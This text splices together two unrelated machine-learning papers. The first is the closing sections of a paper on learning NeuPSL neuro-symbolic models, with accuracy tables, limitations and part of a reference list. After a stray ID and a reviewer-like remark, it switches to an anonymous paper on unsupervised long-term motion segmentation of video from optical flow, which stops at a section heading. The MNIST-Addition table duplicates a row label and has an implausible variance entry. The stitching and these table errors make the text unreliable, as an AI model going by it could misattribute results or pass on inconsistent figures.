**Deep HL-MRF learning** Next, we evaluate the prediction performance of deep NeuPSL models. Here, we study the standard low-data setting for Citeseer and Cora. Specifically, results are averaged over 10 randomly sampled splits using 5% of the nodes for training, 5% of the nodes for validation, and 1,000 nodes for testing. We also report the prediction performance of the same strong baseline models used in Pryor et al. (2023) for this task: DeepStochLog (Winters et al., 2022) and a Graph Convolutional Network (GCN) (Kipf & Welling, 2017). Additionally, we investigate performance on MNIST-Addition, a widely used NeSy evaluation task first introduced by Manhaeve et al. (2018). In MNIST-Addition, models must determine the sum of two lists of MNIST images, for example, two images depicting the digits 3 and 5 with the label 8. The challenge stems from the lack of labels for the MNIST images; only the final sum of the equation is provided during training, 8 in this example. Implementation details for the neural and symbolic components of the NeuPSL models for both the citation network and MNIST-Add experiments are provided in Appendix E.6.
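For concreteness, MNIST-Add1 training instances can be built as in the following sketch (our own construction with torchvision, not the authors' code): images are paired and only the sum survives as supervision.

```python
from torchvision import datasets, transforms

mnist = datasets.MNIST(root="data", train=True, download=True,
                       transform=transforms.ToTensor())

def make_add1_instances(ds, n_instances):
    instances = []
    for k in range(n_instances):
        (x1, d1), (x2, d2) = ds[2 * k], ds[2 * k + 1]
        instances.append((x1, x2, d1 + d2))   # digit labels are discarded;
    return instances                          # only the sum supervises learning

train = make_add1_instances(mnist, 3000)
x1, x2, s = train[0]
print(x1.shape, x2.shape, s)   # torch.Size([1, 28, 28]) twice, and a sum in [0, 18]
```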
Table 5: Accuracy of DeepStochLog, GCN, and NeuPSL on Citeseer and Cora.

| | DeepStochLog | GCN | NeuPSL (Energy) | NeuPSL (SP) | NeuPSL (MSE) | NeuPSL (BCE) |
|----------|--------------|--------------|-----------------|--------------|--------------|--------------|
| Citeseer | 62.68 ± 3.84 | 67.42 ± 0.66 | 69.63 ± 1.33 | 69.78 ± 1.42 | 69.62 ± 1.27 | 69.64 ± 1.33 |
| Cora | 71.28 ± 1.98 | 80.32 ± 1.11 | 80.41 ± 1.81 | 78.59 ± 4.93 | 81.48 ± 1.45 | 81.28 ± 1.45 |

Table 6: Accuracy of CNN, LTN, DeepProbLog, and NeuPSL on MNIST-Addition.

| | CNN | LTN | DeepProbLog | NeuPSL (Energy) | NeuPSL (BCE) |
|----------------|--------------|---------------|---------------|-----------------|--------------|
| **MNIST-Add1** | | | | | |
| 2,000 | 17.16 ± 0.62 | 69.25 ± 15.68 | 85.41 ± 01.28 | 87.96 ± 01.58 | 88.84 ± 02.07 |
| 3,000 | 78.99 ± 01.11 | 92.90 ± 00.51 | 92.59 ± 01.40 | 95.69 ± 00.91 | 95.70 ± 02.84 |
| **MNIST-Add2** | | | | | |
| 1,500 | 01.31 ± 00.25 | 02.02 ± 00.93 | 71.37 ± 03.99 | 90.20 ± 32.79 | 76.00 ± 2.61 |
| 1,500 | 01.69 ± 00.27 | 71.79 ± 27.76 | 87.44 ± 02.15 | 90.56 ± 06.61 | 93.04 ± 2.26 |

Table 5 shows that fitting the neural network weights of a NeuPSL model with our NeSy-EBM learning framework is effective. NeuPSL models fit with the MSE and BCE losses consistently outperform both DeepStochLog and the GCN baseline. Moreover, Table 6 demonstrates NeuPSL models trained with Algorithm 1 and a BCE loss can achieve up to a 16 percentage point performance improvement over those trained with a value-based loss.

## 7 LIMITATIONS

Our learning framework is limited to NeSy-EBMs satisfying the two assumptions made in Section 4. While we advance the theory for NeuPSL to show it meets the assumptions, we do not know how to support NeSy-EBMs with non-differentiable value-functions. One approach is to substitute the inference program with a principled approximation. Lastly, although the idea of leveraging inference algorithms, such as BCD, that effectively use warm-starts to improve learning runtimes is general, our inference algorithms were implemented for a NeSy system with an LCQP structure.

## 8 CONCLUSIONS AND FUTURE WORK

We introduced a general learning framework for NeSy-EBMs and demonstrated its applicability with NeuPSL. Additionally, we proposed a novel NeuPSL inference formulation and algorithm with practical and theoretical advantages. A promising direction for future work is to extend the learning framework to support approximate inference solutions for estimating the objective gradient to further improve learning runtimes. In addition, the empirical results presented in this work motivate generalizing and applying our learning framework to additional NeSy systems and tasks.

REFERENCES

Kareem Ahmed, Stefano Teso, Kai-Wei Chang, Guy Van den Broeck, and Antonio Vergari. Semantic probabilistic layers for neuro-symbolic learning. In NeurIPS, 2022.

Stephen Bach, Matthias Broecheler, Bert Huang, and Lise Getoor. Hinge-loss Markov random fields and probabilistic soft logic. Journal of Machine Learning Research (JMLR), 18(1):1–67, 2017.

Sebastian Bader and Pascal Hitzler. Dimensions of neural-symbolic integration - A structured survey. arXiv, 2005.

Samy Badreddine, Artur d'Avila Garcez, Luciano Serafini, and Michael Spranger. Logic tensor networks. AI, 303(4):103649, 2022.

David Belanger, Bishan Yang, and Andrew McCallum. End-to-end learning for structured prediction energy networks. In ICML, 2017.

Dimitri Bertsekas. Control of Uncertain Systems with a Set-Membership Description of Uncertainty. PhD thesis, MIT, 1971.

Dimitri Bertsekas.
Convex Optimization Theory. Athena Scientific, 2009.

Dimitri Bertsekas and John N. Tsitsiklis. Parallel and Distributed Computation: Numerical Methods. Prentice Hall, 1989.

Tarek R. Besold, Artur S. d'Avila Garcez, Sebastian Bader, Howard Bowman, Pedro M. Domingos, Pascal Hitzler, Kai-Uwe Kühnberger, Luís C. Lamb, Daniel Lowd, Priscila Machado Vieira Lima, Leo de Penning, Gadi Pinkas, Hoifung Poon, and Gerson Zaverucha. Neural-symbolic learning and reasoning: A survey and interpretation. arXiv, 2017.

Joseph Bonnans and Alexander Shapiro. Optimization problems with perturbations: A guided tour. SIAM Review, 40(2):228–264, 1998.

Joseph Bonnans and Alexander Shapiro. Perturbation Analysis of Optimization Problems. Springer, 2000.

Stephen Boyd and Lieven Vandenberghe. Convex Optimization. Cambridge University Press, 2004.

Stephen Boyd, Neal Parikh, Eric Chu, Borja Peleato, and Jonathan Eckstein. Distributed optimization and statistical learning via the alternating direction method of multipliers. Foundations and Trends in Machine Learning (FTML), 3(1):1–122, 2010.

Jerome Bracken and James T. McGill. Mathematical programs with optimization problems in the constraints. Operations Research, 21(1):37–44, 1973.

Michael Collins. Discriminative training methods for hidden Markov models: Theory and experiments with perceptron algorithms. In EMNLP, 2002.

Benoît Colson, Patrice Marcotte, and Gilles Savard. An overview of bilevel optimization. Annals of Operations Research, 153(1):235–256, 2007.

Thomas H. Cormen, Charles E. Leiserson, Ronald L. Rivest, and Clifford Stein. Introduction to Algorithms, Third Edition. The MIT Press, 3rd edition, 2009.

Cristina Cornelio, Jan Stuehmer, Shell Xu Hu, and Timothy Hospedales. Learning where and when to reason in neuro-symbolic inference. In ICLR, 2023.

John Danskin. The theory of max-min, with applications. SIAM Journal on Applied Mathematics, 14(4):641–664, 1966.

Sridhar Dasarth, Sai Akhil Puranam, Karmvir Singh Phogat, Sunil Reddy Tiyyagura, and Nigel Duffy. DeepPSL: End-to-end perception and reasoning. In IJCAI, 2023.

Artur d'Avila Garcez, Marco Gori, Luís C. Lamb, Luciano Serafini, Michael Spranger, and Son N. Tran. Neural-symbolic computing: An effective methodology for principled integration of machine learning and reasoning. Journal of Applied Logics, 6(4):611–632, 2019.
xUe1YqEgd6
However, if I understand it correctly, the temporal consistency in equation (7) remains constrained to neighboring consecutive frames, similar to ST-MS. The primary distinction lies in using B-splines to model long-term motion changes and in a different network architecture.
UNSUPERVISED MOTION SEGMENTATION IN ONE GO: SMOOTH LONG-TERM MODEL OVER A VIDEO Anonymous authors Paper under double-blind review ABSTRACT Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Motion segmentation methods often proceed frame by frame. We want to go beyond this classical paradigm and perform motion segmentation over a video sequence in one go. This would be a prominent added value for downstream computer vision tasks, and could provide a pretext criterion for unsupervised video representation learning. In this perspective, we propose a novel long-term spatio-temporal model operating in a totally unsupervised way. It takes as input a volume of consecutive optical flow (OF) fields, and delivers a volume of segments of coherent motion over the video. More specifically, we have designed a transformer-based network, where we leverage a mathematically well-founded framework, the Evidence Lower Bound (ELBO), to infer the loss function. The loss function combines a flow reconstruction term involving spatio-temporal parametric motion models that couple, in a novel way, polynomial (quadratic) motion models for the \((x, y)\) spatial dimensions with B-splines for the time dimension of the video sequence, and a regularization term enforcing temporal consistency on the masks. We report experiments on four VOS benchmarks with convincing quantitative results. We also highlight through visual results the key contributions to temporal consistency brought by our method. 1 INTRODUCTION When dealing with videos, motion segmentation is one of the key issues. Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Computer vision methods usually proceed frame by frame. We want to go beyond this classical paradigm and segment the different motion entities in a video sequence in one go. We thus thoroughly investigate the temporal dimension of the motion segmentation problem. Since the optical flow (OF) yields all the information on the movement between two images of the video sequence, it is natural to base motion segmentation on optical flow. Motion segmentation is a computer vision task in its own right, but it is also useful for diverse downstream tasks such as independent moving object detection, object tracking, or action recognition, to name a few. It is also leveraged in video object segmentation (VOS), most often coupled with appearance. The optical flow field at time \(t\) enables us to obtain the segmentation at frame \(t\) of the video. However, taking a large time window, and even the whole video sequence, is beneficial, since motion entities are generally consistent throughout a video sequence (or at least within every video shot for long videos). Indeed, temporal coherence is inherent to motion. Therefore, it is essential that motion segmentation take advantage of it, especially in a long-term perspective. In this paper, we propose an original holistic method for multiple motion segmentation from optical flow over a video sequence. To the best of our knowledge, our optical flow segmentation (OFS) method is the first fully unsupervised network to involve long-term temporal consistency and to segment multiple motions in a video sequence in one go. The main contributions of our work are as follows. Our network takes as input a volume of consecutive optical flows, and delivers consistent motion segmentation maps throughout the video sequence.
It involves a transformer module allowing for long-term interactions. It is trained in a completely unsupervised manner, without any manual annotation or ground-truth data of any kind. The loss function is inferred by leveraging the Evidence Lower Bound (ELBO) framework, and comprises a flow reconstruction term with original spatio-temporal parametric motion models and an additional term enforcing temporal consistency on the segmentation masks. We model with B-splines the long-term temporal evolution of the motion model parameters. Our method also involves a latent representation of the segment motion augmented with positional embedding. The rest of the paper is organized as follows. Section 2 describes related work on motion segmentation. Section 3 presents our unsupervised network for multiple motion segmentation in one go, embedding long-term temporal consistency. In Section 4 we provide implementation details. Section 5 reports results on four VOS benchmarks with a comparison to state-of-the-art unsupervised motion segmentation methods. Finally, Section 6 contains concluding remarks. 2 RELATED WORK Motion segmentation aims to break down each frame of a video sequence into components (or segments) of coherent motion. Usually, each motion segment is identified by a motion model, which can be hand-crafted, such as affine or quadratic polynomial models, or sometimes learned. Motion segmentation has been investigated for decades [19, 23, 38]. However, we focus on recent methods in this section. Since accurate and efficient methods for estimating optical flow are now available, motion segmentation methods can leverage optical flow as a reliable input. The advent of deep learning methods in computer vision, and more recently the use of transformer-based networks with attention mechanisms [11], has also encompassed motion segmentation. In [35], a transformer module, more specifically the slot attention mechanism introduced in [18], is leveraged to perform motion segmentation from the optical flow. As a matter of fact, it addresses a binary segmentation problem, foreground moving object vs background. The loss function is composed of two terms, a flow reconstruction term and an entropy term making the masks as binary as possible. Another approach, able to cope with multiple motion segmentation, is adopted in [34]. Nonlinear subspace filters are learned from stacked deep multi-layer perceptrons, and motion segmentation is then obtained at inference by applying K-means to the output embeddings. In [21], the Expectation-Maximization (EM) framework is leveraged to define the loss function and the training procedure of an unsupervised frame-by-frame motion segmentation method, where 12-parameter quadratic motion models are involved. The same authors proposed an extension of that method in [22] to better handle the temporal dimension of the problem, by considering triplets of flows as input. In [36], the authors developed an adversarial method that generates a mask hiding the input optical flow, while an inpainter network attempts to recover the flow within the mask. The rationale is that no correct reconstruction of the inside flow can be achieved from the outside flow if the hidden area exhibits an independent motion, and thus constitutes a motion segment. The temporal dimension of motion segmentation has been considered in various ways [30].
Regarding deep learning approaches, motion segmentation at time t is improved at training time in [35] by taking as input flows between t and several time instants before and after t. The authors of [8] consider several consecutive RGB frames as input of their self-supervised method. Optical flow is only computed at training time, and the loss function also comprises a temporal consistency term. However, the latter is not applied to two consecutive segmentation masks, but to pairings between the same frame t and another (more or less distant) one. In [9], spatio-temporal transformers were designed for video object segmentation involving temporal feature propagation. VOS usually requires motion segmentation, often coupled with appearance [5, 10, 37]. It was addressed with supervised or semi-supervised methods as in [7, 9, 12], but also with unsupervised methods [36, 35, 21]. VOS is concerned with the segmentation of primary objects, i.e., objects moving in the foreground of a scene and possibly tracked by the camera [39]. Thus, VOS generally involves binary ground truth separating the primary moving object from the background. This is for instance the case for the DAVIS2016 benchmark [26]. Recent works have revisited the way appearance and motion are coupled for VOS. The AMD method [17] includes two pathways, an appearance one and a motion one. Although it does not use optical flow as input and brings out the objectness concept, it nevertheless relies on a coarse motion representation. The RCF method [16] involves learnable motion models, and is structured in two stages, a motion-supervised object discovery stage and then a refinement stage with residual motion prediction and high-level appearance supervision. However, the method cannot distinguish objects undergoing different motions. In [6], the prediction of probable motion patterns is used at the training stage as a cue to learn objectness from videos. Divided attention is promoted in [14]. The resulting DivA method is based on the same principle as [36], namely that motion segments are mutually uninformative. However, it is not limited to binary segmentation: it can segment a variable number of moving objects from optical flow, by leveraging a slot attention mechanism guided by the image content through a cross-modal conditional slot decoder. Our fully unsupervised approach differs from these previous works in several respects. We rely only on optical flow and take a volume of OF fields as input, providing a volume of consistent segmentation maps. We introduce B-splines to define parametric motion models able to correctly handle motion evolution over time, and we express long-term temporal consistency. We infer the loss function from the Evidence Lower Bound (ELBO) framework. In [22], the authors also deal with temporal consistency. However, they only took a triplet of optical flow fields as input, they did not resort to transformers, and the temporal part of their motion model was just a linear (first-order polynomial) model in time. In addition, their temporal linkage of the consecutive motion segmentations over a video sequence was an ad hoc post-processing. In contrast, we define a fully integrated long-term model that is trained end-to-end in an unsupervised way. We will call our method the LT-MS method, for long-term motion segmentation, and in contrast, we will refer to the method of [22] as the ST-MS method, for short-term motion segmentation.
3 Long-term Motion Segmentation Method We have designed a transformer-based network for multiple motion segmentation from optical flow. It is inspired by the MaskFormer architecture [4], but it only comprises one head, corresponding to the mask prediction, as described in Fig. 1. The network takes as input a volume, of flexible temporal length, comprising several consecutive optical flow fields. Temporal consistency is expressed in two main ways at the training stage. Firstly, we associate a space-time motion model with each segment to characterize its motion along with the evolution of the latter over time. Secondly, the loss function comprises an additional term enforcing consistent labeling of the motion segments over the volume.

Figure 1: Overall architecture of our multiple motion segmentation method ensuring temporal consistency with the loss term $L_c$ and the B-spline space-time motion models $\theta_k$ (for $k = 1, \ldots, K$). It takes as input a volume of $T$ flow fields. It comprises a 3D U-net ($e$ and $d$ boxes) and a transformer decoder ($t$ box). It also involves positional encoding. A cross-attention product yields the $K$ segmentation masks corresponding to the input volume. For the sake of clarity, the block diagram is represented for three motion segments ($K = 3$). $L_r$ is the flow-reconstruction loss term.

3.1 Spatio-temporal Parametric Motion Model The set of $T$ consecutive flows will be designated as a space-time volume (or volume, to make it short). The volume could even be the whole video sequence. Our space-time motion model is estimated through B-spline functions [32]. We assign a spatio-temporal parametric motion model $\tilde{f}_{\theta_k}$ to each motion segment $k$, $k = 1, \ldots, K$, where $\theta_k$ specifies the motion model $f$ for segment $k$. The motion model involves $J$ parameters, and each parameter $\theta_{kj}$, $j = 1, \ldots, J$, of the model results from a B-spline function of order $n$ in the variable $t$ over the space-time volume. In practice, we take $n = 3$. The number $L$ of control points is given by $L = 2 + \lfloor \frac{T-2}{\nu} \rfloor$, where $\nu$ sets the temporal frequency of the control points. We put a control point at both ends of the volume (at $t = 1$ and $t = T$), and the other control points are equidistantly placed between the two. Most often, the control points are not located at time points of the video sequence. The space-time spline-based motion model is illustrated in Fig. 2. Just for this illustration, the motion models are computed within the two segments, foreground moving object and background, provided by the ground truth. The estimated motion model of the foreground moving object is able to capture the periodic nature of the swing motion, as demonstrated by the plots of the computed motion model parameters. Also, the motion model computed in the background segment perfectly fits the camera motion. Articulated motion (the woman's legs) would require multiple-motion segmentation.

**Figure 2:** Illustration of the spatio-temporal spline-based motion model. Top row: input flows displayed with the HSV color code for the *swing* video of the DAVIS2016 dataset, binary segmentation ground truth, and flows generated by the estimated spline-based motion models for the two segments. Bottom row: plot of the temporal evolution of the six estimated model parameters corresponding to the flow $u$-coordinate for the foreground moving object.

Any parametric motion model could be considered.
We use the 12-parameter quadratic motion model to be able to account for the continuously varying depth surface of the objects in the scene, especially for the whole background, and for complex object or camera motions. In contrast, the affine and the 8-parameter quadratic motion models assume a planar object surface. Indeed, the latter exactly corresponds to the projection in the image of the 3D rigid motion of a planar surface; for velocity fields, it is equivalent to the homography transform. However, in the presence of severe depth effects (strong depth discontinuities) and camera motion, the static scene cannot be represented by a single motion model, due to the motion parallax produced by static objects located in the foreground. Regarding first the spatial dimension of the motion model, the 2D flow vector yielded by the full quadratic motion model at point $(x, y)$ writes:

$$\tilde{f}_\theta(x, y) = (\theta_1 + \theta_2 x + \theta_3 y + \theta_7 x^2 + \theta_8 xy + \theta_9 y^2, \ \theta_4 + \theta_5 x + \theta_6 y + \theta_{10} x^2 + \theta_{11} xy + \theta_{12} y^2)^T. \quad (1)$$

To correctly handle complex temporal evolution, we resort to the spline approximation, as aforementioned. By denoting now $S_n(\theta_k)$ the subscript of $\tilde{f}$, we emphasize that the motion model parameters for each segment $k$ are estimated through the B-spline functions. More specifically, we have:

$$\tilde{f}_{S_n(\theta_k)}(i, t) = \sum_{l=1}^{L} \tilde{f}_{\theta_{k,l}}(i, t) B_{n,l}(t), \quad (2)$$

where $B_{n,l}$ is the $l^{th}$ B-spline and $\theta_{k,l}$ corresponds to the $l^{th}$ control point of the spline function.
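To make eqs. (1)-(2) concrete, here is a minimal NumPy/SciPy sketch, not the authors' code: the clamped-uniform knot construction is our reading of the control-point placement described above, and all function and variable names are ours.

```python
import numpy as np
from scipy.interpolate import BSpline

def bspline_basis(T, nu=3, degree=3):
    """B-spline basis functions B_{n,l}(t) of eq. (2), evaluated at t = 1..T.

    L = 2 + floor((T - 2) / nu) control points: one at each end of the
    volume, the rest evenly spaced (clamped uniform knots, our assumption).
    Returns an array of shape (T, L)."""
    L = 2 + (T - 2) // nu
    interior = np.linspace(1.0, float(T), L - degree + 1)[1:-1]
    knots = np.concatenate([[1.0] * (degree + 1), interior,
                            [float(T)] * (degree + 1)])
    ts = np.arange(1, T + 1, dtype=float)
    ts[-1] -= 1e-9  # stay just inside the spline support at the right end
    return np.stack([BSpline(knots, np.eye(L)[l], degree)(ts)
                     for l in range(L)], axis=1)

def quadratic_flow(theta, xs, ys):
    """Eq. (1): flow of the 12-parameter quadratic motion model.

    theta: (12,) parameters; xs, ys: (H, W) normalized grid coordinates."""
    u = (theta[0] + theta[1] * xs + theta[2] * ys
         + theta[6] * xs ** 2 + theta[7] * xs * ys + theta[8] * ys ** 2)
    v = (theta[3] + theta[4] * xs + theta[5] * ys
         + theta[9] * xs ** 2 + theta[10] * xs * ys + theta[11] * ys ** 2)
    return np.stack([u, v])  # (2, H, W)

def spline_motion_flow(theta_ctrl, xs, ys, T, nu=3):
    """Eq. (2): time-varying model flow of one segment.

    theta_ctrl: (L, 12) motion parameters at the L control points.
    Eq. (1) is linear in theta, so blending the parameters with the
    basis and then applying eq. (1) equals blending the model flows."""
    B = bspline_basis(T, nu)               # (T, L)
    assert B.shape[1] == theta_ctrl.shape[0]
    theta_t = B @ theta_ctrl               # (T, 12) parameters per frame
    return np.stack([quadratic_flow(th, xs, ys) for th in theta_t])
```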
### 3.2 Loss Function

We consider a volume of optical flow fields $f \in \mathbb{R}^{2 \times T \times W \times H}$, the spatial grid $\Omega \in \mathbb{R}^{W \times H}$, and $T$ temporal steps. We denote $f(i, t) \in \mathbb{R}^2$ the flow associated to site $i \in \Omega$ at time $t$. We assume that we can decompose the flow into a set of $K$ segments, each one exhibiting a coherent motion. Flow vectors within a given segment $k$ are represented by a smooth parametric motion model parametrized by $\vartheta_k$. Variable $z_{i,t}$ conveys the motion segmentation: $z_{i,t}^k = 1$ if site $(i, t)$ belongs to segment $k$. $z$ and $\vartheta = \{\vartheta_k, k = 1 \cdots K\}$ are latent variables, and $f$ is the observed data. Following [13], we introduce an approximate distribution over segmentation and motion model parameters:

$$q(z, \vartheta | f) = q(z | f) q(\vartheta) = \left( \prod_{t=1}^{T} \prod_{i \in \Omega} \prod_{k=1}^{K} q(z_{i,t}^k | f) \right) \left( \prod_{k} q(\vartheta_k) \right), \quad (3)$$

where \( q(\vartheta_k) \triangleq \delta(\theta_k) \), with \( \delta \) the Dirac distribution, and \( q(z_{i,t}^k|f) = g_\phi(f)_{i,t}^k \). \( g_\phi \) is our network model, taking as input the optical flow volume and returning a probabilistic segmentation volume. We can also write the data log-likelihood over a dataset \( D \) of optical flow volumes \( f \) as:

\[
\log p(D) = \sum_{f \in D} \log p(f) = \sum_{f \in D} \left( \mathbb{E}_{q(z,\vartheta|f)}\left[\log \frac{p(f,z,\vartheta)}{q(z,\vartheta|f)}\right] + KL(q(z,\vartheta|f)\,||\,p(z,\vartheta|f)) \right) \geq \sum_{f \in D} \left( \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] - KL(q(z,\vartheta|f)\,||\,p(z,\vartheta)) \right), \quad (4)
\]

where we recognize the Evidence Lower Bound (ELBO). Following the assumption stated above, we can write our likelihood as:

\[
p(f|z,\vartheta) = \prod_{t=1}^{T} \prod_{k=1}^{K} p(f(t)|\vartheta_k,z) \propto \prod_{t=1}^{T} \prod_{k=1}^{K} \prod_{i \in \Omega} \exp\left(-\|f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)\|_1/\xi_{f,t}\right)^{z_{i,t}^k}, \quad (5)
\]

where \( \tilde{f}_{S_n(\vartheta_k)}(i,t) \) is the flow vector given by the parametric motion model of parameters \( \vartheta_k \) at point \((i,t)\), as defined in Section 3.1 through the spline approximation, and \( \xi_{f,t} = \sum_i \|f(i,t)\|_1 \) is a normalizing factor. From this likelihood, we can write the left term of the ELBO as:

\[
L_r = \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] = \sum_{t=1}^{T} \sum_{k} \mathbb{E}_q[\log p(f(t)|\vartheta_k,z)] = -\sum_{t=1}^{T} \sum_{i \in \Omega} \sum_{k} g_\phi(f)_{i,t}^k \,\|f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)\|_1/\xi_{f,t}. \quad (6)
\]

The term \( KL(q(z,\vartheta|f)\,||\,p(z,\vartheta)) \) allows us to define a prior over the segmentation. We want to enforce the property that the segmentation labels are temporally consistent, i.e., similar between neighbouring frames. We approximate this term using the temporal consistency loss defined in [22], as it showed good experimental results and is efficient to compute at training time:

\[
L_c = \frac{1}{2K|\Omega|} \sum_{i \in \Omega} \sum_{t=2}^{T} \mathbb{1}[\|f(i,t) - f(i,t-1)\|_1 < \lambda] \sum_{k=1}^{K} |g_\phi(f)_{i,t}^k - g_\phi(f)_{i,t-1}^k|. \quad (7)
\]

The threshold \( \lambda \) allows us to discard occlusion areas. The loss function is thus defined by:

\[
\sum_{f \in D} L(f,\phi,\theta) = \sum_{f \in D} -L_r(f,\phi,\theta) + \beta L_c(f,\phi). \quad (8)
\]

We set \( \beta = 1 \). The training procedure alternately updates \( \theta \) and \( \phi \), with \( \alpha \) as learning rate:

\[
\text{for } f \in D : \quad \theta^* = \arg \min_\theta L(f,\phi,\theta); \quad \phi_{t+1} = \phi_t - \alpha \nabla_\phi L(f,\phi,\theta^*). \quad (9)
\]

### 3.3 Network Architecture

The overall architecture of our unsupervised multiple motion segmentation framework is illustrated in Fig. 1. It includes two main modules. The first one, taking the flow volume as input, is a 3D U-net [29]. The latent code, augmented with positional embeddings, is directed to the transformer decoder. Then, by cross-attention, the output formed by the volume of segmentation masks is produced. The training of the overall architecture is based on the minimization of the loss function defined above, while the motion model parameters of the segments are given by the B-spline estimation. Temporal consistency is provided by the loss function and the space-time motion models.
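To illustrate the two loss terms, here is a minimal PyTorch sketch; it is our fragment rather than the authors' code, the tensor layouts are assumed, and the reconstruction term is written directly as the positive quantity \(-L_r\) minimized in eq. (8).

```python
import torch

def reconstruction_term(flow, flow_hat, seg):
    """-L_r of eq. (6): soft-masked L1 flow reconstruction error.

    flow:     (T, 2, H, W) input optical flow volume f
    flow_hat: (K, T, 2, H, W) flows of the K parametric motion models
    seg:      (K, T, H, W) soft masks g_phi(f)"""
    xi = flow.abs().sum(dim=(1, 2, 3)).clamp_min(1e-8)     # (T,), per-frame normalizer
    err = (flow.unsqueeze(0) - flow_hat).abs().sum(dim=2)  # (K, T, H, W) L1 residuals
    return (seg * err / xi.view(1, -1, 1, 1)).sum()

def consistency_term(flow, seg):
    """L_c of eq. (7): temporal consistency of the masks outside occlusions."""
    K, _, H, W = seg.shape
    flow_diff = (flow[1:] - flow[:-1]).abs().sum(dim=1)    # (T-1, H, W)
    lam = flow_diff.flatten().quantile(0.99)               # 99th quantile (Sec. 4.1)
    keep = (flow_diff < lam).float()                       # discard likely occlusions
    seg_diff = (seg[:, 1:] - seg[:, :-1]).abs().sum(dim=0) # summed over the K masks
    return (keep * seg_diff).sum() / (2 * K * H * W)

# total loss of eq. (8), with beta = 1 as in the paper:
# loss = reconstruction_term(flow, flow_hat, seg) + consistency_term(flow, seg)
```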
### 4 Implementation

#### 4.1 Implementation Details

Following [6, 16, 21, 22, 35], we adopt the RAFT method [31] to compute the optical flow fields. More specifically, we use the RAFT version trained on the MPI Sintel dataset [2]. We downsample the computed flow fields to feed the network with $128 \times 224$ vector fields. The output segmentation maps are upsampled to the initial frame size for evaluation. Thus, we can perform efficient training and inference stages. We typically take flow volumes of temporal length $T = 9$ at training time. However, at test time, we can process flow volumes of larger temporal length, and even the flow volume of the whole sequence. To compute the spatio-temporal parametric motion models, the $x$ and $y$ coordinates are normalized within $[-1, 1]$, and a similar normalization is applied to the $t$ coordinate. The full 12-parameter quadratic motion model is chosen in all the experiments, and we take $\nu = 3$ for the frequency factor in the B-spline approximation. We select for each site $i$ the segment $\hat{k}$ with the highest prediction. In eq. (7), we set $\lambda$ as the 99th quantile of the flow differences over the flow volume. Our LT-MS method is very efficient at test time. The computational time amounts on average to 210 fps on a P100 GPU, that is, twice as fast as the ST-MS method [22]. This is certainly due to the long flow sequence given as input to the network, which allows for the parallelisation of some heavy computations. In addition, our LT-MS architecture remains lightweight, since it combines only three U-net layers and a transformer decoder operating on the downsampled feature space. Let us also stress that our LT-MS method does not involve any post-processing at all.

### 4.2 Data Augmentation and Network Training

We applied two types of data augmentation dedicated to optical flow. First, we add a global flow to the input flow, similarly as in the EM [21] and ST-MS [22] methods. However, in our case, the global flow is given by a full spline-based spatio-temporal motion model whose parameters are chosen at random. The same global flow is added to the flow fields of a given input volume. This allows us to mimic diverse camera motions, enforcing that the motion segments are independent of them. In addition, we corrupt a few flows out of the nine input ones. We thus simulate poorly estimated flow fields at some time instants, which the temporal consistency should overcome. Our motion segmentation method is fully unsupervised: we never use any manual annotation. We train our model only on the FlyingThings3D (FT3D) dataset [20], whatever the dataset considered at test time. This ensures that our LT-MS network generalizes well to unseen datasets. Regarding hyperparameter setting, we select the stopping epoch from the loss function evaluated on the DAVIS2016 training set. Additional information on the optimization stage is given in the Appendix.

## 5 Experimental Results

We have carried out comparative experiments on four datasets: DAVIS2016[^1], SegTrackV2[^2], FBMS59 [24], and DAVIS2017-motion [33]. More information on the datasets is provided in the Appendix.

### 5.1 Ablation Study

We have conducted an ablation study to assess three main components of our LT-MS method with four masks ($K = 4$), in particular those related to the temporal dimension of the problem. We changed one component at a time, as specified hereafter: we use the polynomial space-time quadratic motion model of ST-MS [22] instead of the space-time motion model based on B-splines over the input sequence; we omit the consistency term $L_c$ in the loss function; we just take the convnet without the transformer decoder. All the ablation experiments were run on the three datasets DAVIS2016, FBMS59, and SegTrackV2. Results are collected in Table 1. In addition, we performed them for two input-sequence configurations, respectively input sequences of ten flows and input sequences of 120 flows (in practice, the whole video for the DAVIS2016 dataset). We can observe that the three ablations have almost the same impact on the performance. The three corresponding model components, i.e., the spline-based motion model, the temporal-consistency loss term, and the transformer decoder, are thus all beneficial in similar proportions.
They are able to handle the temporal dimension of the problem and the temporal motion evolution along the sequence in a compelling way. Admittedly, the contributions of these three components are more significant for the FBMS59 and SegTrackV2 datasets.

[^1]: https://davischallenge.org/index.html
[^2]: https://paperswithcode.com/dataset/segtrack-v2-1

Table 1: Ablation study for three main components of our LT-MS method ($K = 4$) on DAVIS2016, FBMS59, and SegTrackV2. Only one model component is modified at a time. The performance scores are given by the Jaccard index $J$. We report ablation results with two input-flow sequence lengths (or cut sizes), respectively obtained by dividing the video into pieces of ten successive frames or by considering 120 successive frames (in practice, the whole video for DAVIS2016).

| Ablation / Dataset | DAVIS2016 (10) | DAVIS2016 (120) | FBMS59 (10) | FBMS59 (120) | SegTrackV2 (10) | SegTrackV2 (120) |
|-----------------------------|------|------|------|------|------|------|
| Full Model LT-MS-K4 | 74.8 | 72.4 | 61.0 | 58.2 | 61.3 | 60.4 |
| Unet3D only | 73.0 | 71.3 | 56.6 | 55.5 | 58.2 | 57.3 |
| No consistency term $L_c$ | 73.5 | 71.0 | 57.5 | 55.5 | 58.0 | 57.5 |
| Polynomial space-time quadratic model | 73.4 | 69.8 | 57.4 | 54.5 | 57.8 | 56.6 |

However, the dynamic content of the majority of the DAVIS2016 videos, and hence the overall performance score, cannot allow us to fully appreciate the contributions of these three model components. Yet, they can be acknowledged by visualizing results obtained on some videos of DAVIS2016, as shown in the Appendix.

5.2 Quantitative and Comparative Evaluation

